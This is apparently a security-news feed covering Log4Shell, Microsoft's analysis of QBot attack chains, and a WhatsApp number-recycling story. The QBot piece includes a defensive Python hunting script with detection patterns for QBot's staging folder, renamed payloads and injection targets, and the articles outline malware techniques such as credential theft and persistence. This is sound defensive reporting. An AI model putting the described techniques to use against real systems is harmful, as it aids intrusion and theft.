							A vulnerability in the open source Apache logging library <a href="https://www.wired.com/story/log4j-flaw-hacking-internet/" rel="external nofollow">Log4j sent system administrators and security professionals scrambling</a> over the weekend. Known as Log4Shell, the flaw is exposing some of the world's most popular applications and services to attack, and the outlook hasn't improved since the vulnerability came to light on Thursday. If anything, it's now excruciatingly clear that Log4Shell will continue to wreak havoc across the internet for years to come.
						</p>

						<p>
							 
						</p>

						<p>
							Hackers have been exploiting the bug since the beginning of the month, according to researchers from <a href="https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html" rel="external nofollow" target="_blank">Cisco</a> and <a href="https://twitter.com/eastdakota/status/1469800951351427073" rel="external nofollow" target="_blank">Cloudflare</a>. But attacks ramped up dramatically following Apache's disclosure on Thursday. So far, attackers have exploited the flaw to install cryptominers on vulnerable systems, steal system credentials, burrow deeper within compromised networks, and steal data, according to a recent report <a href="https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/" rel="external nofollow" target="_blank">from Microsoft</a>.
						</p>

						<p>
							 
						</p>

						<p>
							The range of impacts is so broad because of the nature of the vulnerability itself. Developers use logging frameworks to keep track of what happens in a given application. To exploit Log4Shell, an attacker only needs to get the system to log a strategically crafted string of code. From there they can load arbitrary code on the targeted server and install malware or launch other attacks. Notably, hackers can introduce the snippet in seemingly benign ways, like by sending the string in an email or setting it as an account username.
						</p>


						<p>
							Major tech players, including <a href="https://aws.amazon.com/security/security-bulletins/AWS-2021-006/" rel="external nofollow" target="_blank">Amazon Web Services</a>, <a href="https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/" rel="external nofollow" target="_blank">Microsoft</a>, <a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd" rel="external nofollow" target="_blank">Cisco</a>, <a href="https://cloud.google.com/log4j2-security-advisory" rel="external nofollow" target="_blank">Google Cloud</a>, and <a href="https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-websphere-application-server-cve-2021-44228/" rel="external nofollow" target="_blank">IBM</a> have all found that at least some of their services were vulnerable and have been rushing to issue fixes and advise customers about how best to proceed. The exact extent of the exposure is still coming into view, though. Less fastidious organizations or smaller developers who may lack resources and awareness will be slower to confront the Log4Shell threat.
						</p>

						<p>
							 
						</p>

						<p>
							“What is almost certain is that for years people will be discovering the long tail of new vulnerable software as they think of new places to put exploit strings,” says independent security researcher Chris Frohoff. “This will probably be showing up in assessments and penetration tests of custom enterprise apps for a long time.”
						</p>

						<p>
							 
						</p>

						<p>
							The vulnerability is already being used by a “growing set of threat actors,” US Cybersecurity and Infrastructure Security Agency director Jen Easterly said in a <a href="https://www.cisa.gov/news/2021/12/11/statement-cisa-director-easterly-log4j-vulnerability" rel="external nofollow" target="_blank">statement</a> on Saturday. She added that the flaw is “one of the most serious I’ve seen in my entire career, if not the most serious” in a call with critical infrastructure operators on Monday, as first reported <a href="https://www.cyberscoop.com/log4j-cisa-easterly-most-serious/" rel="external nofollow" target="_blank">by CyberScoop</a>. In that same call, a CISA official estimated that hundreds of millions of devices are likely affected.
						</p>


						<p>
							The hard part will be tracking all of those down. Many organizations don't have a clear accounting of every program they use and the software components within each of those systems. The UK's National Cyber Security Centre <a href="https://www.ncsc.gov.uk/news/apache-log4j-vulnerability" rel="external nofollow" target="_blank">emphasized</a> on Monday that enterprises need to “discover unknown instances of Log4j” in addition to patching the usual suspects. By its nature, open source software can be incorporated wherever developers want, meaning that when a major vulnerability crops up, exposed code can lurk around every corner. Even before Log4Shell, software supply chain security advocates had increasingly pushed for “software bills of materials,” or SBOMs, to make it easier to take stock and keep up with security protections.
						</p>
					</div>
				</div>
			</div>

			<div>
				<div>
					<div>
						<p>
							 
						</p>

						<p>
							Security professionals note that while it's important to be aware of the vulnerability's inevitable lasting impact, the first priority is to take as much action as possible now to shorten that tail as the frenzy of exploitation continues.
						</p>


						<p>
							“If you have an internet-facing server vulnerable to Log4Shell that you haven't patched yet, you almost certainly have an incident response on your hands,” says incident responder and former NSA hacker Jake Williams. “Threat actors were quick to operationalize this vulnerability."
						</p>

						<p>
							Williams adds that while logging systems are important and it can be risky to implement fixes quickly, it should be technically doable—and worth it—for most organizations. “On the defense side, we're seeing a lot of enterprises afraid to patch without testing,” he says. “That's the wrong approach in this case.”
						</p>

						<p>
							 
						</p>

						<p>
							The concern remains, too, that the situation could get even worse. Attackers could potentially develop a worm that exploits the flaw and spreads automatically from one vulnerable device to the next. But while it's technically possible, it may not be a top priority for malicious hackers, says researcher <a href="https://www.wired.com/story/confessions-marcus-hutchins-hacker-who-saved-the-internet/" rel="external nofollow">Marcus Hutchins, who found a kill switch for the notorious WannaCry worm</a> in 2017.
						</p>

						<p>
							 
						</p>

						<p>
							“Whilst it's always a possibility, worms for these kinds of exploits are rare, due to the development overhead generally exceeding perceived benefits,” Hutchins says. “It's much easier to just spray exploitation attempts from a server than develop self-propagating code. It's also usually a race to exploit as many systems as possible before they are patched or exploited by others, so it doesn't really make sense to take the time to develop a worm.”
						</p>

						<p>
							 
						</p>

						<p>
							Attackers will still look for creative new ways to discover and continue exploiting as many vulnerable systems as possible. The scariest part of Log4Shell, though, is how many organizations won't even realize that they have systems at risk.
						</p>
					</div>
				</div>
			</div>
		</div>
	</div>
</div>

<p>
	 
</p>

<p>
	<a href="https://www.wired.com/story/log4j-log4shell/" rel="external nofollow">The Log4J Vulnerability Will Haunt the Internet for Years</a>
</p>
]]></description><guid isPermaLink="false">3634</guid><pubDate>Tue, 14 Dec 2021 03:01:28 +0000</pubDate></item><item><title>Microsoft: These are the building blocks of QBot malware attacks</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-these-are-the-building-blocks-of-qbot-malware-attacks-r3624/</link><description><![CDATA[<p>
	As QBot campaigns increase in size and frequency, researchers are looking into ways to break the trojan's distribution chain and tackle the threat.
</p>

<p>
	 
</p>

<p>
	Over the past few years, Qbot (Qakbot or QuakBot) has grown into widely spread Windows malware that allows threat actors to steal bank credentials and Windows domain credentials, spread to other computers, and provide remote access to ransomware gangs.
</p>

<p>
	 
</p>

<p>
	Victims usually become infected with Qbot through another malware infection or via phishing campaigns using various lures, including fake invoices, payment and banking information, or scanned documents.
</p>

<p>
	 
</p>

<p>
	Ransomware gangs known to have used Qbot to breach corporate networks include REvil, Egregor, ProLock, PwndLocker, and MegaCortex strains.
</p>

<p>
	 
</p>

<p>
	Due to this, understanding how threat actors infiltrate and move in a Qbot compromised environment is critical for helping defenders stop intruders before they can unleash devastating attacks.
</p>

<h2>
	Building blocks
</h2>

<p>
	In a new report, Microsoft breaks down the QBot attack chain into distinct "building blocks," which can be different depending on the operator using the malware and the type of attack they are conducting.
</p>

<p>
	 
</p>

<p>
	To illustrate an attack chain, Microsoft used Lego pieces of different colors, each representing a step in an attack.
</p>

<p>
	 
</p>

<p>
	"However, based on our analysis, one can break down a Qakbot-related incident into a set of distinct “building blocks,” which can help security analysts identify and respond to Qakbot campaigns," explains the <a href="https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/" rel="external nofollow" target="_blank">research</a> by Microsoft.
</p>

<p>
	 
</p>

<p>
	"Figure 1 below represents these building blocks. From our observation, each Qakbot attack chain can only have one block of each color. The first row and the macro block represent the email mechanism used to deliver Qakbot."
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="building_blocks.jpg" class="ipsImage" data-ratio="73.47" height="385" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/Diagrams/building_blocks.jpg">
		</p>

		<figcaption>
			The building blocks of QBot attacks<br>
			Source: Microsoft
		</figcaption>
	</figure>
</div>

<p>
	These different attack chains are either the result of a highly-targeted approach or an attempt to succeed in a single infiltration point by trying out multiple attack channels simultaneously. 
</p>

<p>
	 
</p>

<p>
	Even when looking at three devices targeted in the same campaign, the attackers may use three different attack chains.
</p>

<p>
	 
</p>

<p>
	For example, Device A ultimately suffers a ransomware attack, while Device B is used for lateral movement, and Device C is used to steal credentials.
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="same_campaign.jpg" class="ipsImage" data-ratio="75.10" height="540" width="531" src="https://www.bleepstatic.com/images/news/u/1220909/Diagrams/same_campaign.jpg">
		</p>

		<figcaption>
			Differences between machines compromised in the same QBot attack<br>
			Source: Microsoft
		</figcaption>
	</figure>
</div>

<p>
	The use of different attack chains in the same attack underlines the importance of analyzing all evidence in post-attack investigations, as no safe conclusions can be drawn by looking into sample logs or what occurred on one device.
</p>

<h2>
	Qbot attacks start with an email
</h2>

<p>
	Whatever happens in later stages, it is essential to underline that the QBot threat begins with the arrival of an email carrying malicious links, attachments, or embedded images.
</p>

<p>
	 
</p>

<p>
	The messages are typically short, containing a call to action that email security solutions ignore.
</p>

<p>
	 
</p>

<p>
	Using embedded links is the weakest approach, as many are missing the HTTP or HTTPS protocol in the URLs, making them not clickable in most email clients. Furthermore, the use of non-clickable URLs is likely to bypass email security solutions by not being an HTML link.
</p>

<p>
	 
</p>

<p>
	However, recipients are unlikely to copy and paste these URLs into a new tab, so the success rates drop.
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="email.jpg" class="ipsImage" data-ratio="75.10" height="540" width="662" src="https://www.bleepstatic.com/images/news/u/1220909/Phishing/email.jpg">
		</p>

		<figcaption>
			Emails containing URLs to malicious Excel downloads<br>
			Source: Microsoft
		</figcaption>
	</figure>
</div>

<p>
	However, their chances get much better when the actors hijack email threads to construct a spoofed reply.
</p>

<p>
	 
</p>

<p>
	We’ve seen this type of internal reply chain attack working successfully <a href="https://www.bleepingcomputer.com/news/security/ikea-email-systems-hit-by-ongoing-cyberattack/" target="_blank" rel="external nofollow">against IKEA</a> recently, and it’s particularly hard for security solutions to track and stop it.
</p>

<p>
	 
</p>

<p>
	In the cases of malicious attachments, the attacks are again weak because most security products would flag ZIP attachments as potentially malicious.
</p>

<p>
	 
</p>

<p>
	The latest addition in QBot’s delivery repertoire is embedded images in the email body, which contain the malicious URLs.
</p>

<div>
	<figure>
		<img alt="image.jpg" class="ipsImage" data-ratio="75.10" height="540" width="546" src="https://www.bleepstatic.com/images/news/u/1220909/Phishing/image.jpg">
		<figcaption>
			QBot email containing an embedded image.<br>
			Source: Microsoft
		</figcaption>
	</figure>
</div>

<p>
	Again, this is another way to evade content security tool detection, as the image is a screenshot of text urging the recipient to type the link themselves.
</p>

<p>
	 
</p>

<p>
	Doing so results in downloading a laced Excel file that carries the malicious macros that eventually load QBot on the machine.
</p>

<h2>
	Later building blocks
</h2>

<p>
	After the delivery of the email, Qbot attack chains use the following building blocks:
</p>

<p>
	 
</p>

<ul>
	<li>
		Macro enablement - Every Qbot campaign delivered via email utilizes malicious macros to deliver the Qbot payload.
	</li>
	<li>
		Qakbot delivery - Qbot is typically downloaded as an executable with an .htm or .dat extension, and then renamed to non-existent file extensions like .waGic or .wac. Microsoft notes that in many cases, the Qbot delivery includes creating a C:\Datop folder as <a href="https://www.bleepingcomputer.com/news/security/ikea-email-systems-hit-by-ongoing-cyberattack/" target="_blank" rel="external nofollow">described in this article</a>.
	</li>
	<li>
		Process injection for discovery - Qbot payloads are then injected as DLLs into other processes, most commonly MSRA.exe and Mobsync.exe.
	</li>
	<li>
		Scheduled tasks - Creates a scheduled task so that Qbot is launched every time Windows is restarted and a user logs into the device.
	</li>
	<li>
		Credential and browser data theft - Steal credentials from the Windows Credential Manager and browser history, passwords, and cookies from installed web browsers.
	</li>
	<li>
		Email exfiltration - Steal email from infected devices that the attackers use in <a href="https://www.bleepingcomputer.com/news/security/qbot-steals-your-email-threads-again-to-infect-other-victims/" target="_blank" rel="external nofollow">other reply-chain phishing attacks</a> against employees and business partners.
	</li>
	<li>
		Additional payloads, lateral movement, and ransomware - This block in the attack chain covers a variety of malicious activities and payloads, including deploying Cobalt Strike beacons, spreading laterally through the network, and deploying ransomware.
	</li>
</ul>
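<p>
	The building blocks above map directly onto host indicators a defender can hunt for: a download into C:\Datop with an .htm or .dat extension, a rename to .waGic or .wac, that renamed file loaded into MSRA.exe or Mobsync.exe, and a scheduled task pointing at it. The script below is an added example, not Microsoft's hunting queries; the JSON event format, field names and the sample telemetry are constructed for illustration, and a host is only reported when at least two distinct blocks are seen, since any single indicator on its own is weak evidence.
</p>

```python
"""Hunt for the QBot building blocks described above in endpoint telemetry.

Example code added here; it is not Microsoft's query set.  The event schema
(one JSON object per line with host/event/path/... fields) and the sample
lines are assumptions made for this illustration.
"""
import json
import re
from collections import defaultdict

# Indicators taken from the building-block list.
STAGING_DIR_RE = re.compile(r"^c:\\datop\\", re.IGNORECASE)      # C:\Datop staging folder
DOWNLOAD_EXT_RE = re.compile(r"\.(htm|dat)$", re.IGNORECASE)      # downloaded payload names
RENAMED_EXT_RE = re.compile(r"\.(wagic|wac)$", re.IGNORECASE)     # non-existent extensions
INJECTION_TARGETS = {"msra.exe", "mobsync.exe"}                  # common injection hosts


def classify(event):
    """Map one telemetry event to the building block it evidences, or None."""
    kind = event.get("event")
    path = event.get("path", "")
    if kind == "file_create" and STAGING_DIR_RE.search(path) and DOWNLOAD_EXT_RE.search(path):
        return "qakbot_delivery"
    if kind == "file_rename" and RENAMED_EXT_RE.search(event.get("new_path", "")):
        return "qakbot_delivery"
    if (kind == "image_load"
            and event.get("process", "").lower() in INJECTION_TARGETS
            and RENAMED_EXT_RE.search(path)):
        return "process_injection"
    action = event.get("action", "")
    if kind == "scheduled_task" and (STAGING_DIR_RE.search(action) or RENAMED_EXT_RE.search(action)):
        return "scheduled_task"
    return None


def hunt(lines, min_blocks=2):
    """Return {host: sorted block names} for hosts showing >= min_blocks distinct blocks.

    Correlating per host matters: a lone .htm in a temp folder or a lone scheduled
    task is normal, but the chain delivery -> rename -> injection -> persistence
    on one machine is the pattern the article describes.
    """
    seen = defaultdict(set)
    for line in lines:
        ev = json.loads(line)
        label = classify(ev)
        if label:
            seen[ev["host"]].add(label)
    return {host: sorted(blocks) for host, blocks in seen.items() if len(blocks) >= min_blocks}


# Constructed sample telemetry (not real data): wks-a shows the full chain,
# wks-b is benign activity, wks-c shows a single indicator only.
SAMPLE_EVENTS = [
    r'{"host": "wks-a", "event": "file_create", "path": "C:\\Datop\\doc.dat"}',
    r'{"host": "wks-a", "event": "file_rename", "path": "C:\\Datop\\doc.dat", "new_path": "C:\\Datop\\doc.waGic"}',
    r'{"host": "wks-a", "event": "image_load", "process": "MSRA.exe", "path": "C:\\Datop\\doc.waGic"}',
    r'{"host": "wks-a", "event": "scheduled_task", "action": "C:\\Datop\\doc.waGic"}',
    r'{"host": "wks-b", "event": "file_create", "path": "C:\\Users\\bob\\Downloads\\report.htm"}',
    r'{"host": "wks-b", "event": "scheduled_task", "action": "C:\\Program Files\\Backup\\backup.exe"}',
    r'{"host": "wks-c", "event": "image_load", "process": "mobsync.exe", "path": "C:\\Temp\\x.wac"}',
]

if __name__ == "__main__":
    for host, blocks in hunt(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(blocks)}")
```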

<p>
	 
</p>

<p>
	QBot distribution started spiking again in November 2021 and is <a href="https://www.bleepingcomputer.com/news/security/qbot-returns-for-a-new-wave-of-infections-using-squirrelwaffle/" target="_blank" rel="external nofollow">helped further</a> with the emergence of the 'Squirrelwaffle' attacks.
</p>

<p>
	 
</p>

<p>
	As QBot infections can lead to various dangerous and disruptive attacks, all admins need to become intimately familiar with the malware and the tactics it uses to spread throughout a network.
</p>

<p>
	 
</p>

<p>
	Since all infections begin with an email, it is crucial to focus your vigilance there, avoid clicking on unknown URLs or enabling macros, and provide employees with phishing awareness training.
</p>

<p>
	 
</p>

<p>
	For those interested in hunting QBot, Microsoft refreshes this <a href="https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/tree/master/Campaigns/Qakbot" rel="external nofollow" target="_blank">GitHub repository</a> with up-to-date queries frequently.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/microsoft-these-are-the-building-blocks-of-qbot-malware-attacks/" rel="external nofollow">Microsoft: These are the building blocks of QBot malware attacks</a>
</p>
]]></description><guid isPermaLink="false">3624</guid><pubDate>Sun, 12 Dec 2021 21:27:38 +0000</pubDate></item><item><title>Software flaw puts computer systems around the world at risk, allowing cyberattacks</title><link>https://nsaneforums.com/news/security-privacy-news/software-flaw-puts-computer-systems-around-the-world-at-risk-allowing-cyberattacks-r3619/</link><description><![CDATA[<p>
	BOSTON (AP) — A critical vulnerability in a widely used software tool — one quickly exploited in the online game Minecraft — is rapidly emerging as a major threat to organizations around the world.
</p>

<p>
	 
</p>

<p>
	“The internet’s on fire right now,” said Adam Meyers, senior vice president of intelligence at the cybersecurity firm Crowdstrike. “People are scrambling to patch,” he said, “and all kinds of people scrambling to exploit it.” He said Friday morning that in the 12 hours since the bug’s existence was disclosed that it had been “fully weaponized,” meaning malefactors had developed and distributed tools to exploit it.
</p>

<p>
	 
</p>

<p>
	The flaw may be the worst computer vulnerability discovered in years. It was uncovered in a utility that’s ubiquitous in cloud servers and enterprise software used across industry and government. Unless it is fixed, it grants criminals, spies and programming novices alike easy access to internal networks where they can loot valuable data, plant malware, erase crucial information and much more.
</p>

<p>
	 
</p>

<p>
	“I’d be hard-pressed to think of a company that’s not at risk,” said Joe Sullivan, chief security officer for Cloudflare, whose online infrastructure protects websites from malicious actors. Untold millions of servers have it installed, and experts said the fallout would not be known for several days.
</p>

<p>
	 
</p>

<p>
	Amit Yoran, CEO of the cybersecurity firm Tenable, called it “the single biggest, most critical vulnerability of the last decade” — and possibly the biggest in the history of modern computing.
</p>

<p>
	 
</p>

<p>
	The vulnerability, dubbed “Log4Shell,” was rated 10 on a scale of one to 10 by the Apache Software Foundation, which oversees development of the software. Anyone with the exploit can obtain full access to an unpatched computer that uses the software.
</p>

<p>
	 
</p>

<p>
	Experts said the extreme ease with which the vulnerability lets an attacker access a web server — no password required — is what makes it so dangerous.
</p>

<p>
	 
</p>

<p>
	The vulnerability, located in open-source Apache software used to run websites and other web services, was reported to the foundation on Nov. 24 by the Chinese tech giant Alibaba, the foundation said. It took two weeks to develop and release a fix.
</p>

<p>
	 
</p>

<p>
	But patching systems around the world could be a complicated task. While most organizations and cloud providers such as Amazon should be able to update their own web servers easily, the same library is also frequently embedded in third-party products, which can only be updated by their vendors.
</p>

<p>
	 
</p>

<p>
	Yoran, of Tenable, said organizations need to presume they’ve been compromised and act quickly.
</p>

<p>
	 
</p>

<p>
	The first obvious signs of the flaw’s exploitation appeared in Minecraft, an online game hugely popular with kids and owned by Microsoft. Meyers and security expert Marcus Hutchins said Minecraft users were already using it to execute programs on the computers of other users by pasting a short message in a chat box.
</p>

<p>
	 
</p>

<p>
	Microsoft said it had issued a software update for Minecraft users. “Customers who apply the fix are protected,” it said.
</p>

<p>
	 
</p>

<p>
	Researchers reported finding evidence the vulnerability could be exploited in servers run by companies such as Apple, Amazon, Twitter and Cloudflare.
</p>

<p>
	 
</p>

<p>
	Cloudflare’s Sullivan said there was no indication his company’s servers had been compromised. Apple, Amazon and Twitter did not immediately respond to requests for comment.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.pennlive.com/nation-world/2021/12/software-flaw-puts-computer-systems-around-the-world-at-risk-allowing-cyberattacks.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">3619</guid><pubDate>Thu, 01 Jan 1970 00:00:00 +0000</pubDate></item><item><title>I Accidentally Hacked a Peruvian Crime Ring</title><link>https://nsaneforums.com/news/security-privacy-news/i-accidentally-hacked-a-peruvian-crime-ring-r3613/</link><description><![CDATA[<div>
	<div data-journey-hook="client-content" data-testid="BodyWrapper">
		<div>
			<p>
				As soon as I arrived in Lima last week, I did what countless travelers do every day: go to the cellphone store to get a SIM card with a local number. But this typically mundane ritual, no more exciting than exchanging your dollars for euros, soon turned unexpected—I hacked a criminal network.
			</p>

			<p>
				 
			</p>

			<p>
				When I was planning my trip, narcotics were the last things on my mind. In the sanguine days before Omicron, Peru felt like a dream, a dose of warmth and sunshine before heading home to the bleak New York winter. But minutes after I left the Movistar store, phone number in hand, I found my new holiday pastime: telling people they had the wrong number. I assumed that it’d be a minor annoyance, a few text messages before people passed the word around. But things got much stranger when I installed WhatsApp.
			</p>

			<p>
				 
			</p>

			<p>
				The problems started with a jarring home screen. Instead of the fresh slate of a new account, I was met with a list of dozens of groups that I apparently was already a member of. Even with my embarrassingly poor Spanish, terms like “Dark Web” stood out, and the sexually suggestive emojis required no translation. Then I started getting messages. And while most of you will never find yourself embroiled in a Peruvian crime ring, your digital life faces the exact same vulnerabilities.
			</p>


			<p>
				WhatsApp is encrypted, so people felt secure to speak candidly. And they began to speak a lot about drugs, sex work, and other terms I didn’t want to translate. People told me about upcoming deliveries, mentioning places I had never heard of. I was in heaven, sitting beside a rooftop pool overlooking the beaches and cliffs of Miraflores, and having a panic attack.
			</p>

			<p>
				 
			</p>

			<p>
				I started playing out scenes from cheesy mob movies, the naive bystander who’s killed because he saw too much. So I deleted everything. Every message, every group. I even went through mental exercises to blur my own memories, forcing myself to forget. But people continued to reach out. And when I continued to explain they had the wrong person, they were insistent: “Delete the number!”
			</p>

			<p>
				 
			</p>

			<p>
				And that’s how I ended up giving cybersecurity advice to a crime ring. I promised to delete the account, to switch the number, but then I explained how they were already compromised. Like so many WhatsApp accounts, my predecessor’s didn’t have <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://faq.whatsapp.com/general/verification/how-to-reset-your-two-step-verification-pin/?lang=en"}' data-offer-url="https://faq.whatsapp.com/general/verification/how-to-reset-your-two-step-verification-pin/?lang=en" href="https://faq.whatsapp.com/general/verification/how-to-reset-your-two-step-verification-pin/?lang=en" rel="external nofollow" target="_blank">a PIN</a>, the opt-in security feature that can block exactly what I did by accident, taking over another person’s account, and in effect another person’s world. I could get a new number, but without a PIN, whoever next got the number Movistar had loaned me would end up facing the exact same horrors.
			</p>


			<p>
				<a data-event-click='{"element":"ExternalLink","outgoingURL":"https://www.similarweb.com/corp/blog/research/market-research/worldwide-messaging-apps/"}' data-offer-url="https://www.similarweb.com/corp/blog/research/market-research/worldwide-messaging-apps/" href="https://www.similarweb.com/corp/blog/research/market-research/worldwide-messaging-apps/" rel="external nofollow" target="_blank">As in nearly every country in South America, WhatsApp is Peru’s most popular communications platform.</a> In some countries, the Facebook-owned app is so ubiquitous that <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://www.panoramas.pitt.edu/news-and-politics/whatsapp%E2%80%99s-popularity-abroad-vs-us"}' data-offer-url="https://www.panoramas.pitt.edu/news-and-politics/whatsapp%E2%80%99s-popularity-abroad-vs-us" href="https://www.panoramas.pitt.edu/news-and-politics/whatsapp%E2%80%99s-popularity-abroad-vs-us" rel="external nofollow" target="_blank">it has effectively replaced texting,</a> allowing users to circumvent phone company charges and reliably connect in areas with poor cell coverage. Another draw, of course, is security. But while encryption is indispensable, it’s not enough. End-to-end encryption means Facebook and anyone who intercepts your messages can’t read the content of what you wrote. But they can know everything else. With WhatsApp, they know who your contacts are, what groups you belong to, and when and to whom you’re sending messages.
			</p>


			<p>
				While <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://www.theverge.com/2017/2/10/14574294/whatsapp-two-step-factor-verification-security"}' data-offer-url="https://www.theverge.com/2017/2/10/14574294/whatsapp-two-step-factor-verification-security" href="https://www.theverge.com/2017/2/10/14574294/whatsapp-two-step-factor-verification-security" rel="external nofollow" target="_blank">WhatsApp has supported two-factor authentication since 2017</a>, it has never been a default requirement. And no one knows exactly how many of WhatsApp’s 2 billion accounts are unsecured. WhatsApp should make PINs mandatory, or at least the default. But it’s far from alone. Not only do encrypted messenger platforms like Signal have similar vulnerabilities, but many others do too. Even after I deleted WhatsApp, I continued to receive a flurry of texts from banks and payment apps, all looking to confirm someone else’s identity.
			</p>
		</div>
	</div>
</div>

<div>
	<div data-journey-hook="client-content" data-testid="BodyWrapper">
		<div>
			<p>
				 
			</p>

			<p>
				This is the pattern of modern cybersecurity. At a moment when we know just how easy it is to hack email accounts, when passwords and ID numbers are compromised every day, our cellphones have become our ultimate source of digital identity. But they’re very, very vulnerable. With a couple of missed payments or someone spoofing your identity, your digital life—which is to say, much of your life—could end up in the hands of the next person to pick up that phone number, and they may not be as eager to delete what they find.
			</p>

			<p>
				 
			</p>

			<p>
				Using compromised WhatsApp accounts, fraudsters have <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://nypost.com/2021/11/19/grandmother-scammed-out-of-thousands-by-whatsapp-fraudster-pretending-to-be-daughter/"}' data-offer-url="https://nypost.com/2021/11/19/grandmother-scammed-out-of-thousands-by-whatsapp-fraudster-pretending-to-be-daughter/" href="https://nypost.com/2021/11/19/grandmother-scammed-out-of-thousands-by-whatsapp-fraudster-pretending-to-be-daughter/" rel="external nofollow" target="_blank">tricked targets into forking over huge sums of money</a> by impersonating friends and loved ones. <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://www.express.co.uk/finance/personalfinance/1532750/santander-whatsapp-scam-warning-parents-money-stolen"}' data-offer-url="https://www.express.co.uk/finance/personalfinance/1532750/santander-whatsapp-scam-warning-parents-money-stolen" href="https://www.express.co.uk/finance/personalfinance/1532750/santander-whatsapp-scam-warning-parents-money-stolen" rel="external nofollow" target="_blank">One bank, Santander, reported a 532 percent increase in WhatsApp fraud cases connected to the messaging platform.</a> And people’s willingness to send sensitive data over WhatsApp leaves the platform ripe for abuse as a blackmail platform. It made global headlines when <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://www.wsj.com/articles/racy-affair-saga-between-jeff-bezos-and-enquirer-reaches-final-chapter-11638370114"}' data-offer-url="https://www.wsj.com/articles/racy-affair-saga-between-jeff-bezos-and-enquirer-reaches-final-chapter-11638370114" href="https://www.wsj.com/articles/racy-affair-saga-between-jeff-bezos-and-enquirer-reaches-final-chapter-11638370114" rel="external nofollow" target="_blank">Jeff Bezos found himself targeted by a plot</a> to extort him for his steamy texts and photos, but you don’t need to be a billionaire to become a target.
			</p>

			<p>
				 
			</p>

			<p>
				The threat goes beyond hackers and accidental onlookers. <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://www.rollingstone.com/politics/politics-features/whatsapp-imessage-facebook-apple-fbi-privacy-1261816/"}' data-offer-url="https://www.rollingstone.com/politics/politics-features/whatsapp-imessage-facebook-apple-fbi-privacy-1261816/" href="https://www.rollingstone.com/politics/politics-features/whatsapp-imessage-facebook-apple-fbi-privacy-1261816/" rel="external nofollow" target="_blank">WhatsApp, Apple, and other encrypted platforms are increasingly handing your chat history over to law enforcement</a>. With a simple subpoena (which is much easier for police to get than a warrant), they can get much of your account information. With a full warrant, the platforms can provide records on every aspect of your digital network (apart from the message itself). They can record who we communicate with, how often, the groups we're part of, and the identity of every member, along with your full contacts list. Even worse, WhatsApp can do this in nearly real time, transforming a “privacy-protective platform” into a government tracking tool.
			</p>

			<p>
				 
			</p>

			<p>
				For developers, the takeaway is clear: Never rely on a phone number alone. For users, the lesson is evergreen, regardless of the technology: You never truly know who will read what you write, even if it’s only a bumbling tourist.
			</p>
		</div>
	</div>
</div>

<p>
	 
</p>

<p>
	<a href="https://www.wired.com/story/i-accidentally-hacked-a-peruvian-crime-ring/" rel="external nofollow">I Accidentally Hacked a Peruvian Crime Ring</a>
</p>

<p>
	 
</p>

<p>
	(May require free registration to view)
</p>
]]></description><guid isPermaLink="false">3613</guid><pubDate>Fri, 10 Dec 2021 22:36:44 +0000</pubDate></item><item><title>New zero-day exploit for Log4j Java library is an enterprise nightmare</title><link>https://nsaneforums.com/news/security-privacy-news/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare-r3612/</link><description><![CDATA[<p>
	Proof-of-concept exploits for a critical zero-day vulnerability in the ubiquitous Apache Log4j Java-based logging library are currently being shared online, exposing home users and enterprises alike to ongoing remote code execution attacks.
</p>

<p>
	 
</p>

<p>
	<a href="https://logging.apache.org/log4j/2.x/index.html" rel="external nofollow" target="_blank">Log4j</a> is developed by the Apache Foundation and is widely used by both enterprise apps and cloud services.
</p>

<p>
	 
</p>

<p>
	Thus, while home users might have moved away from Java (although popular games like Minecraft still use it), anything from enterprise software to web apps and products from Apple, Amazon, Cloudflare, Twitter, and Steam is <a href="https://github.com/YfryTchsGD/Log4jAttackSurface" rel="external nofollow" target="_blank">likely vulnerable to RCE exploits</a> targeting this vulnerability.
</p>

<h2>
	Ongoing scans, exploitation of vulnerable systems
</h2>

<p>
	The bug, now tracked as <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44228" rel="external nofollow">CVE-2021-44228</a> and dubbed Log4Shell or LogJam, is an unauthenticated RCE vulnerability allowing complete system takeover on systems running Log4j versions 2.0-beta9 through 2.14.1.
</p>

<p>
	 
</p>

<p>
	It was <a href="https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html" rel="external nofollow" target="_blank">reported by Alibaba Cloud's security team</a> to Apache on November 24. They also revealed that CVE-2021-44228 impacts default configurations of multiple Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, Apache Flink, and others.
</p>

<p>
	 
</p>

<p>
	After the first proof-of-concept exploit was <a href="https://github.com/tangxiaofeng7/apache-log4j-poc" rel="external nofollow" target="_blank">published on GitHub</a> yesterday, threat actors began scanning the Internet [<a href="https://twitter.com/bad_packets/status/1469225135504650240" rel="external nofollow" target="_blank">1</a>, <a href="https://twitter.com/_mattata/status/1469144854672379905" rel="external nofollow" target="_blank">2</a>] for systems vulnerable to this remotely exploitable security flaw that doesn't require authentication.
</p>

<p>
	 
</p>

<p>
